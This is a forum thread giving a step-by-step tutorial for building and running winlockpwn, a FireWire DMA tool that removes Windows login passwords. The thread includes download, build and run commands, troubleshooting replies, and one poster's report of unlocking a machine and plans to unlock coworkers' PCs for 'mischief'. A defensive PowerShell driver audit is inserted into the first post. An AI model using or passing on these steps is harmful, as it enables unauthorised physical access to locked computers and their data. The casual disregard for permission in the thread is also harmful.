Page 1 of 5 (results 1 to 10 of 46)

Thread: Tutorial Winlockpwn

  1. #1 jonah_15 (Junior Member, joined Jan 2010, 25 posts)

    Tutorial Winlockpwn

    Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool winlockpwn that can unlock a password locked Windows machine in seconds.

    Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I've used Timothy's original document to document how to get the tool working on Backtrack 2 & Backtrack 3 Beta.

    Thanks

    Jonah_15

    Replace hxxp with http & wwx with www

    Step 1

    First we need to install the required libraries:

    libraw1394 v1.3.0

    hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
    tar xvfz libraw1394-1.3.0.tar.gz
    cd libraw1394-1.3.0
    ./configure
    make
    make dev
    make install

    Step 2

    Install Swig

    hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
    tar xvfz swig-1.3.34.tar.gz
    cd swig-1.3.34
    ./configure
    make
    make install

    Step 3

    Install Python 2.3

    hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
    tar xvfz Python-2.3.6.tgz
    mv Python-2.3.6 python-2.3
    cd python-2.3
    ./configure
    make
    make install

    This will install python in /usr/local which means you need to update each script to reference this location.

    Step 4

    Search for and comment out the __attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line:

    vi /usr/local/include/libraw1394/raw1394.h

    Step 5

    Download the software from hxxp://wwx.storm.net.nz/projects/16

    hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
    tar xvfz pythonraw1394-1.0.tar.gz
    cd pythonraw1394
    wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
    chmod +x ./winlockpwn
    vi Makefile (reference /usr/local instead of /usr for python)
    make

    Step 6

    Load the module and set some permissions:

    modprobe raw1394
    chmod 666 /dev/raw1394

    Step 7

    Copy libraw1394.so.8 to /lib:

    cd /usr/local/lib/
    cp libraw1394.so.8 /lib

    Step 8

    Plug the FireWire cable into both your Backtrack system and the target Windows system.

    Step 9

    Run businfo to check the port configurations:
    vi businfo (update the location of python to be /usr/local/bin/python)
    ./businfo

    Step 10

    vi romtool (update the location of python to be /usr/local/bin/python)
    cp libraw1394.so.8 /lib
    ./romtool -s 0 ipod.csr

    Step 11

    vi winlockpwn (update the location of python to be /usr/local/bin/python)
    ./winlockpwn 0 1 3
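    Defender-side counterpart to the procedure above, added here and not part of jonah_15's post or the winlockpwn project: a PowerShell audit of the Windows drivers the attack depends on. The emulated iPod that romtool loads is an SBP-2 device, and Microsoft's KB2516445 guidance blocks this 1394 DMA path by disabling the sbp2port driver; the service names sbp2port, ohci1394 (XP/Vista) and 1394ohci (Windows 7 and later) are assumptions taken from that guidance and Windows driver naming, not from the thread.

```powershell
# Added example: audit (and optionally close) the 1394 DMA path that winlockpwn uses.
# Assumptions: KB2516445's mitigation (sbp2port Start=4) and the 1394 OHCI driver
# service names ohci1394 (XP/Vista) and 1394ohci (Windows 7 and later).
param(
    [switch]$Remediate   # disable sbp2port; needs an elevated shell and a reboot
)

$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$DISABLED    = 4   # driver Start values: 0 boot, 1 system, 2 auto, 3 manual, 4 disabled

function Get-DriverStart {
    param([string]$Name)
    $key = Join-Path $servicesKey $Name
    if (-not (Test-Path $key)) { return $null }            # driver not present
    return (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
}

$findings = foreach ($drv in 'sbp2port', 'ohci1394', '1394ohci') {
    $start = Get-DriverStart -Name $drv
    if ($null -eq $start)          { $state = 'not installed' }
    elseif ($start -eq $DISABLED)  { $state = 'disabled' }
    else                           { $state = 'ENABLED - 1394 DMA possible' }
    New-Object PSObject -Property @{ Driver = $drv; Start = $start; State = $state }
}
$findings | Format-Table Driver, Start, State -AutoSize

# Disabling the SBP-2 port driver is the targeted fix: the "ipod" romtool presents is an
# SBP-2 storage device, which is the device class KB2516445 blocks. Disabling the OHCI
# driver instead removes FireWire entirely (the BIOS option does the same in hardware).
$sbp2Start = Get-DriverStart -Name 'sbp2port'
if ($Remediate -and $null -ne $sbp2Start -and $sbp2Start -ne $DISABLED) {
    Set-ItemProperty -Path (Join-Path $servicesKey 'sbp2port') -Name Start -Value $DISABLED -Type DWord
    Write-Host 'sbp2port set to disabled (Start=4); reboot for the change to take effect.'
}
```

    Run without -Remediate first to see which drivers are present; a host showing sbp2port as ENABLED is exposed to the unlock described in Step 11.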

  2. #2 williamc (Good friend of the forums, Chico CA, joined Feb 2010, 285 posts)

    Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

    wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
    chmod +x ./winlockpwn
    vi Makefile (reference /usr/local instead of /usr for python)
    make
    make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

    William

  3. #3 theprez98 (Moderator, Maryland, joined Jan 2010, 2,533 posts)

    Quote Originally Posted by williamc:
        Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

        wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
        chmod +x ./winlockpwn
        vi Makefile (reference /usr/local instead of /usr for python)
        make
        make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

        William
    Have you considered changing the reference in the makefile to 2.5 instead of 2.3?
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  4. #4 williamc (Good friend of the forums, Chico CA, joined Feb 2010, 285 posts)

    Yes, the Makefile references Python 2.5. Any other ideas? Anyone get this to work following the tutorial?

  5. #5 jonah_15 (Junior Member, joined Jan 2010, 25 posts)

    I also had problems with Python 2.5 but had no issues with Python 2.3.

  6. #6 williamc (Good friend of the forums, Chico CA, joined Feb 2010, 285 posts)

    I got it working with Python 2.5. Here are the modified steps:

    Code:
    cd /pythonraw1394
    nano Makefile
    # modify lines as follows:
    _raw1394.so: raw1394_wrap.c /usr/include/python2.5
         $(CC) -Wall -shared -fPIC -I/usr/include/python2.5 -I/usr/local/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so
    No other modifications to the install were needed. I didn't modify businfo or winlockpwn.

    I successfully wiped the password for a locked Windows XP SP2 machine! Ctrl+Alt+Del and Enter. No password needed.

    Update:
    After running this successfully, I am unable to run it again without restarting Backtrack. I believe the businfo retains the settings for the PC you first plug into. Any way to clear the 1394 settings (maybe take the device down?) and bring it back up in the clear?

    William

  7. #7 jonah_15 (Junior Member, joined Jan 2010, 25 posts)

    What I normally do is go into Windows Device Manager on the target and remove the iPod. After I've done this and plugged the FireWire cable back in, I can successfully run the attack again on the same Windows host.

    I've not needed to reboot backtrack.

    Nice job on Python 2.5

  8. #8 williamc (Good friend of the forums, Chico CA, joined Feb 2010, 285 posts)

    I'm looking to get this working on Vista. From http://storm.net.nz/projects/16
    "people successfully attacking Vista using a slightly modified msv1_0.dll technique"

    I'm researching this, but if anyone can shed some light on it, please do. I've purchased a CardBus FireWire card for use on PCs that don't have FireWire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and you're in! Guys in my office have disabled FireWire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

    An important note: if you're running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts, which may cause some "issues" if you're in a corporate environment. The 2 option only unlocks the PC, which should be enough for whatever mischief you're planning (and have permission to do so).

    William

  9. #9 imported_spudgunman (Junior Member, joined Feb 2007, 78 posts)

    Anyone get this to work? (not the program but the pwnage)

    I get this error:

    IOError: [Errno 22] Invalid argument

    From firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."

    Now if you unplug the FW and plug it back in, repeatedly running the script, it will start scanning memory only to end with a device busy.

    Seems that the "money time" is when the device is detected as a "Hard Drive"; you start scanning the memory at that point. Then the iPod comes in and all work ends.

    Same issue on two computers.

    What are people getting this to work on?

    Also - I understand the idea; could this also work for gathering all the memory and getting the key for the encrypted HDD?

  10. #10 jonah_15 (Junior Member, joined Jan 2010, 25 posts)

    I've successfully tested it on Sony kit, a number of Dells and a Tosh running Windows XP SP2. I do have a couple of Dell XPSs which it's failed on, as it blue screens the devices.

    Results I’ve had running it on Vista machines (I know this particular version of the tool is not for Vista) is that it also blue screens.

    I know you have tested against 2 computers so far; are they the same make?

